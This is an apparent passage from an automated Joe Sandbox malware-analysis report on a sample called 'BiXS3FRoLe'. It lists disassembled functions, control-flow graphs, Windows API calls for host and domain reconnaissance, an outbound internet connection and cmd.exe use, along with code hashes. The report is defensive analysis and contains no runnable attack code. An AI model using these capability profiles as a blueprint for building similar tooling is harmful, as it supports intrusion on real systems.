                                                                                                        • Instruction ID: 5a7425ce851c5c21f425de9233cd32a1e4982cf7e3088fa50051ff837596ea26
                                                                                                        • Opcode Fuzzy Hash: 8c1b3c876411467e4c6458372c6b9c8d8f48292fbc6ff881cd6e9ece8921009b
                                                                                                        • Instruction Fuzzy Hash: 40A15832A242149FDF19EF6CD8427AD7BF0EB06320F14018DE911AB3A1DB358E52DB91
                                                                                                        Function 00B376C2 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 212COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 8286 b376c2-b376d0 8287 b376d2-b376e5 call b259b3 call b25122 8286->8287 8288 b376ea-b376ed 8286->8288 8297 b378cb-b378cf 8287->8297 8288->8287 8289 b376ef-b376f4 8288->8289 8289->8287 8291 b376f6-b376fa 8289->8291 8291->8287 8294 b376fc-b376ff 8291->8294 8294->8287 8296 b37701-b37727 call b44d80 * 2 8294->8296 8302 b377b8-b377ba 8296->8302 8303 b3772d-b3772f 8296->8303 8304 b377c0 8302->8304 8305 b377bc-b377be 8302->8305 8306 b377c2-b377d6 call b44d80 8303->8306 8307 b37735-b37741 call b44d80 8303->8307 8304->8306 8305->8304 8305->8306 8312 b37802 8306->8312 8313 b377d8-b377e3 call b36e62 8306->8313 8307->8306 8314 b37743-b37745 8307->8314 8317 b37805-b3780a 8312->8317 8322 b37896-b37899 8313->8322 8323 b377e9-b377f3 call b378dd 8313->8323 8315 b37748-b3774d 8314->8315 8315->8315 8318 b3774f-b37768 call b34d09 8315->8318 8317->8317 8320 b3780c-b37822 call b34d09 8317->8320 8331 b3776a-b37773 call b34d66 8318->8331 8332 b37778-b3778b call b321c2 8318->8332 8329 b37824-b37827 8320->8329 8330 b3782c-b3783d call b321c2 8320->8330 8327 b378c0-b378c6 call b34d66 8322->8327 8333 b377f8-b377fd 8323->8333 8344 b378c8-b378ca 8327->8344 8336 b378b9-b378bf call b34d66 8329->8336 8345 b37843-b3785d call b259b3 8330->8345 8346 b378d2-b378dc call b2514f 8330->8346 8331->8344 8348 b37791-b377a0 call b36be9 8332->8348 8349 b378d0 8332->8349 8333->8327 8336->8327 8344->8297 8356 b37860-b3787d call b321c2 call b36e62 8345->8356 8348->8349 8357 b377a6-b377b6 call b34d66 8348->8357 8349->8346 8365 b3789b-b378b7 call b259b3 call b378dd 8356->8365 8366 b3787f-b3788d 8356->8366 8357->8306 8365->8336 8366->8356 8368 b3788f-b37895 call b34d66 8366->8368 8368->8322
                                                                                                        APIs
                                                                                                        • _strrchr.LIBCMT ref: 00B37706
                                                                                                        • _strrchr.LIBCMT ref: 00B37711
                                                                                                        • _strrchr.LIBCMT ref: 00B37738
                                                                                                        • _free.LIBCMT ref: 00B3776B
                                                                                                          • Part of subcall function 00B2514F: IsProcessorFeaturePresent.KERNEL32(00000017,00B25121,?,?,00A71F07,?,?,00000016,?,?,00B2512E,00000000,00000000,00000000,00000000,00000000), ref: 00B25151
                                                                                                          • Part of subcall function 00B2514F: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 00B25173
                                                                                                          • Part of subcall function 00B2514F: TerminateProcess.KERNEL32(00000000), ref: 00B2517A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strrchr$Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                        • String ID: .com
                                                                                                        • API String ID: 1283974128-4200470757
                                                                                                        • Opcode ID: c2bbe948e71fe8aaf8c9f00aca1bf585052b5325cfdc5f5793e22da55fb0f55f
                                                                                                        • Instruction ID: 593cb6893ff9387dafdf25a48e3c664a1e588444441515a85433792c3b7afa7a
                                                                                                        • Opcode Fuzzy Hash: c2bbe948e71fe8aaf8c9f00aca1bf585052b5325cfdc5f5793e22da55fb0f55f
                                                                                                        • Instruction Fuzzy Hash: 9751E5B5A48606BADF35AA79DC46A7E7BE8DF41720F3001E9F81097291EF319E10D760
                                                                                                        Function 00AAC470 Relevance: 10.6, APIs: 7, Instructions: 135COMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 9105 aac470-aac4d8 call ae5163 9108 aac4da-aac4e9 call ae5163 9105->9108 9109 aac509-aac50f 9105->9109 9117 aac4fb-aac503 call ae51bb 9108->9117 9118 aac4eb-aac4f6 9108->9118 9110 aac521 9109->9110 9111 aac511-aac519 9109->9111 9115 aac523-aac527 9110->9115 9113 aac5f9-aac620 call ae51bb call b005bb 9111->9113 9114 aac51f 9111->9114 9114->9115 9120 aac539-aac53b 9115->9120 9121 aac529-aac531 call ae89f0 9115->9121 9117->9109 9118->9117 9120->9113 9125 aac541-aac546 9120->9125 9121->9125 9133 aac533-aac536 9121->9133 9129 aac548-aac54a 9125->9129 9130 aac54f-aac56a call b0089a 9125->9130 9129->9113 9135 aac56c-aac571 9130->9135 9136 aac573-aac578 9130->9136 9133->9120 9137 aac57d-aac581 call a72980 9135->9137 9136->9137 9138 aac57a 9136->9138 9140 aac586-aac5f3 call ae94b1 call ae961a call a72a30 call ae89c4 9137->9140 9138->9137 9140->9113
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeGetcvtRegister
                                                                                                        • String ID:
                                                                                                        • API String ID: 2755674607-0
                                                                                                        • Opcode ID: 0212cf89b18b6b27a13ac52a72adbc61cb2cefa6362b747a3e8e11ff2cdda1fb
                                                                                                        • Instruction ID: 1515c60c48c30b629726b224a1887ccfa2e88c33cd5359e16efb84cf8c0c2b60
                                                                                                        • Opcode Fuzzy Hash: 0212cf89b18b6b27a13ac52a72adbc61cb2cefa6362b747a3e8e11ff2cdda1fb
                                                                                                        • Instruction Fuzzy Hash: 5D51E371D007458FDB10DF68CA41BAAB7F4EF19720F14425AE846A7292EB30BD45CBD1
                                                                                                        Function 00B2C5C6 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 9150 b2c5c6-b2c5d0 9151 b2c5d2-b2c5d7 call b30e78 9150->9151 9152 b2c5e0-b2c5fc call b21973 9150->9152 9155 b2c5dc-b2c5de 9151->9155 9158 b2c608-b2c618 call b34d09 9152->9158 9159 b2c5fe-b2c601 9152->9159 9157 b2c654-b2c657 9155->9157 9166 b2c61a-b2c62e call b21973 9158->9166 9167 b2c649-b2c653 call b34d66 9158->9167 9160 b2c603-b2c606 9159->9160 9161 b2c658-b2c676 call b2514f call b01b70 call b2c5c6 9159->9161 9160->9158 9160->9161 9180 b2c67b-b2c681 9161->9180 9174 b2c630-b2c633 9166->9174 9175 b2c63c-b2c647 call b30e78 9166->9175 9167->9157 9174->9161 9178 b2c635-b2c638 9174->9178 9175->9167 9178->9167 9181 b2c63a 9178->9181 9183 b2c683-b2c685 9180->9183 9184 b2c68a-b2c6b9 call b3437a call b2b054 9180->9184 9181->9161 9185 b2c7ae-b2c7b3 call b01bb6 9183->9185 9192 b2c6d3-b2c6e4 call b35b94 9184->9192 9193 b2c6bb-b2c6be 9184->9193 9192->9183 9200 b2c6e6-b2c704 call b2b054 9192->9200 9194 b2c6c0-b2c6c3 9193->9194 9195 b2c6c5 9193->9195 9194->9195 9198 b2c6cf-b2c6d1 9194->9198 9199 b2c6ca call b2514f 9195->9199 9198->9183 9198->9192 9199->9198 9204 b2c706-b2c709 9200->9204 9205 b2c727-b2c741 call b2c20b 9200->9205 9206 b2c710-b2c715 9204->9206 9207 b2c70b-b2c70e 9204->9207 9212 b2c743-b2c749 9205->9212 9213 b2c75d-b2c767 9205->9213 9206->9199 9207->9206 9209 b2c717-b2c719 9207->9209 9209->9205 9211 b2c71b-b2c722 call b34d66 9209->9211 9211->9183 9212->9213 9217 b2c74b-b2c75a call b34d66 9212->9217 9214 b2c790-b2c7ac call b2c7b7 9213->9214 9215 b2c769-b2c770 9213->9215 9214->9185 9215->9214 9219 b2c772-b2c778 9215->9219 9217->9213 9219->9214 9223 b2c77a-b2c77f 9219->9223 9223->9214 9225 b2c781-b2c78b call b34d66 9223->9225 9225->9214
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __cftoe
                                                                                                        • String ID:
                                                                                                        • API String ID: 4189289331-0
                                                                                                        • Opcode ID: ac5e8157f98b6bbfeed3009da728b03e5f8299607b3e1c380a33e0da4c06fad0
                                                                                                        • Instruction ID: 92c5c54ecd207300e1b93a81ed6519e708fac561087091b42a8bafd75e199533
                                                                                                        • Opcode Fuzzy Hash: ac5e8157f98b6bbfeed3009da728b03e5f8299607b3e1c380a33e0da4c06fad0
                                                                                                        • Instruction Fuzzy Hash: 9D510E72900215ABDB359F68AC41FAE7FE8EF49360F2442D9F81D97192DB35DD008AA4
                                                                                                        Function 00B36EB7 Relevance: 7.7, APIs: 5, Instructions: 198pipeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$CreateErrorLastPipe__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 155357802-0
                                                                                                        • Opcode ID: 7ffd507f8902ddab2c495e92ba3a2fe65595088ea7ca38f6d4106424bf40ce11
                                                                                                        • Instruction ID: 165d6109e9ecd2d53bdff15cd7b7becff54d645ebcff04b0df6984c3d405c81d
                                                                                                        • Opcode Fuzzy Hash: 7ffd507f8902ddab2c495e92ba3a2fe65595088ea7ca38f6d4106424bf40ce11
                                                                                                        • Instruction Fuzzy Hash: F7712871A106159BDB24EFBCEC4169E7BE5AF09324F288199F054DF2E2EB34D802CB50
                                                                                                        Function 00B30EF8 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B35B94: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B17B27,?,?,?,?,?,00A71F07,?,?,?), ref: 00B35BC6
                                                                                                        • _free.LIBCMT ref: 00B31003
                                                                                                        • _free.LIBCMT ref: 00B3101A
                                                                                                        • _free.LIBCMT ref: 00B31039
                                                                                                        • _free.LIBCMT ref: 00B31054
                                                                                                        • _free.LIBCMT ref: 00B3106B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3033488037-0
                                                                                                        • Opcode ID: 2396c3280a77352dd5c1339f0dc4828fd5ef9d509f3fea1d87daed9113ae412b
                                                                                                        • Instruction ID: 460a2bb9eaf7a27a8c35c0eff3dbbec8cb065216c2a2dd7dd5582ea77fbecda7
                                                                                                        • Opcode Fuzzy Hash: 2396c3280a77352dd5c1339f0dc4828fd5ef9d509f3fea1d87daed9113ae412b
                                                                                                        • Instruction Fuzzy Hash: A6518131A00704AFDB25DF69C841B6A77F8EF59721F2449E9E849D72A0E731EA41CB50
                                                                                                        Function 00B36C52 Relevance: 7.6, APIs: 5, Instructions: 64synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WaitForSingleObject.KERNEL32(00000010,00000000,00000000,00000000,00000000,?,?,00B24D8C,00000000,00000000,00000001,?,00B8CAC8,00000010,00A788E3,00000000), ref: 00B36C75
                                                                                                        • GetExitCodeProcess.KERNEL32(00000010,00000000), ref: 00B36C84
                                                                                                        • GetLastError.KERNEL32(?,?,00B24D8C,00000000,00000000,00000001,?,00B8CAC8,00000010,00A788E3,00000000), ref: 00B36C9B
                                                                                                        • __dosmaperr.LIBCMT ref: 00B36CBF
                                                                                                        • CloseHandle.KERNEL32(00000010,?,?,00B24D8C,00000000,00000000,00000001,?,00B8CAC8,00000010,00A788E3,00000000), ref: 00B36CD2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 2013101682-0
                                                                                                        • Opcode ID: 31af5f6e9981914ebad871abbedf2231e46fe0a8f7da20608c7f2ee63a432777
                                                                                                        • Instruction ID: af13449cd0f7438deaf4a4c56713ac3ee8ba01852e8ad77483e65ef14ab44fac
                                                                                                        • Opcode Fuzzy Hash: 31af5f6e9981914ebad871abbedf2231e46fe0a8f7da20608c7f2ee63a432777
                                                                                                        • Instruction Fuzzy Hash: 80112572100B20BFC7206F689C8466AB7E8EF86770FB552D4F89883390EB318D41C7A1
                                                                                                        Function 00A838C0 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 399COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetComputerNameExW.KERNEL32(00000000,?,?,AE695AF0,?), ref: 00A83941
                                                                                                        • DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?,?,00000000,?,?,?), ref: 00A839E0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ComputerDomainInformationNamePrimaryRole
                                                                                                        • String ID: Empty$_D:
                                                                                                        • API String ID: 1590873629-2874341529
                                                                                                        • Opcode ID: a1747c4278ab4466ab16713f87f7e3646aa93435d65699681e7c3d68a23b8f37
                                                                                                        • Instruction ID: 40d8893e91b33c02cd46d90e7389a998c287c1c7af63ee4b37f3c7d83bae69e2
                                                                                                        • Opcode Fuzzy Hash: a1747c4278ab4466ab16713f87f7e3646aa93435d65699681e7c3d68a23b8f37
                                                                                                        • Instruction Fuzzy Hash: 24F18971A102598BEB28EB24CD85BADB7F6FB44704F1482D8D089A7291DF759BC4CF90
                                                                                                        Function 00AFCA40 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 158COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(AE695AF0,?,00000000,?), ref: 00AFCA77
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AFCB5B
                                                                                                        • GetFileAttributesW.KERNEL32(?,AE695AF0,?,?,?,?,?,?,?,00B4FCD0,000000FF,?,00A74A32), ref: 00AFCBB2
                                                                                                        Strings
                                                                                                        • boost::filesystem::status, xrefs: 00AFCB0D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesErrorException@8FileLastThrow
                                                                                                        • String ID: boost::filesystem::status
                                                                                                        • API String ID: 1873943377-3746320807
                                                                                                        • Opcode ID: b77354c3bb7cc7a7b6c546aed5031ca6f4c6dfdaebe91725041c907d8a45de55
                                                                                                        • Instruction ID: 7212112cdd705cd9ca88272084a90f65591395af7634fe9b956b50b27953bd91
                                                                                                        • Opcode Fuzzy Hash: b77354c3bb7cc7a7b6c546aed5031ca6f4c6dfdaebe91725041c907d8a45de55
                                                                                                        • Instruction Fuzzy Hash: 6841B57290020D9BCB10EFA9CD85BBEF7B5EB05764F14426AF915A7290D774AD04CB90
                                                                                                        Function 00AFCB70 Relevance: 6.1, APIs: 4, Instructions: 139fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNEL32(?,AE695AF0,?,?,?,?,?,?,?,00B4FCD0,000000FF,?,00A74A32), ref: 00AFCBB2
                                                                                                        • CreateFileW.KERNEL32(?,00000000,00000007,00000000,00000003,02000000,00000000,?,?,?,?,?,?,?,?,00B4FCD0), ref: 00AFCC4D
                                                                                                          • Part of subcall function 00AFC860: CreateFileW.KERNEL32(00AFCC7E,00000008,00000007,00000000,00000003,02200000,00000000,AE695AF0,?,00000000,?,00AFCC7E,?), ref: 00AFC8A3
                                                                                                          • Part of subcall function 00AFC860: CloseHandle.KERNEL32(00000000), ref: 00AFC924
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00B4FCD0), ref: 00AFCC99
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00B4FCD0), ref: 00AFCCA9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseFileHandle$Create$Attributes
                                                                                                        • String ID:
                                                                                                        • API String ID: 2696689969-0
                                                                                                        • Opcode ID: c5cdf5c377fca3178b829cff9d020cd62d1dba226c5f3d1b537090204a4e6960
                                                                                                        • Instruction ID: b7d6a3383970df39f46a14dba0b23a6a9610c435f4d162ee527c621ea80d5ddc
                                                                                                        • Opcode Fuzzy Hash: c5cdf5c377fca3178b829cff9d020cd62d1dba226c5f3d1b537090204a4e6960
                                                                                                        • Instruction Fuzzy Hash: C9518F75E0021CAFDB10DFA9DA85BAEBBB4EF08724F144169F919A7381D7709905CBA0
                                                                                                        Function 00A86330 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 172networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • InternetConnectW.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00A863F4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConnectInternet
                                                                                                        • String ID: 0.0.0.1$`
                                                                                                        • API String ID: 3050416762-3652615328
                                                                                                        • Opcode ID: 493b9057fdc0f187f71cd4ba1f0ade388c0bf13e500b5a1a64f51a8305fc58af
                                                                                                        • Instruction ID: e9ec891402522e19be6279e43bd8f452ae3811218a55e3b76a83ca4acb71346a
                                                                                                        • Opcode Fuzzy Hash: 493b9057fdc0f187f71cd4ba1f0ade388c0bf13e500b5a1a64f51a8305fc58af
                                                                                                        • Instruction Fuzzy Hash: F951D2B0A101599BEF28EF24CD85B9DB7B6EF84304F508199F509AB2D1D774AA84CF48
                                                                                                        Function 00B25182 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID: COMSPEC$cmd.exe
                                                                                                        • API String ID: 269201875-2256226045
                                                                                                        • Opcode ID: d6ab375d4c26ff18c3dc8e1d9d1b54ee439fcc5fe92aabd304270f56f785dc4d
                                                                                                        • Instruction ID: 9d10d31bca98be2b4e0adad88cf35f9ade79e79bd69abac529d9a2327f7d1bcb
                                                                                                        • Opcode Fuzzy Hash: d6ab375d4c26ff18c3dc8e1d9d1b54ee439fcc5fe92aabd304270f56f785dc4d
                                                                                                        • Instruction Fuzzy Hash: D431CA71D01535DBCB34EBA4A84156FBBF8EF41321B2101E6E909A7291DA305E44CBE1
                                                                                                        Function 00A72980 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
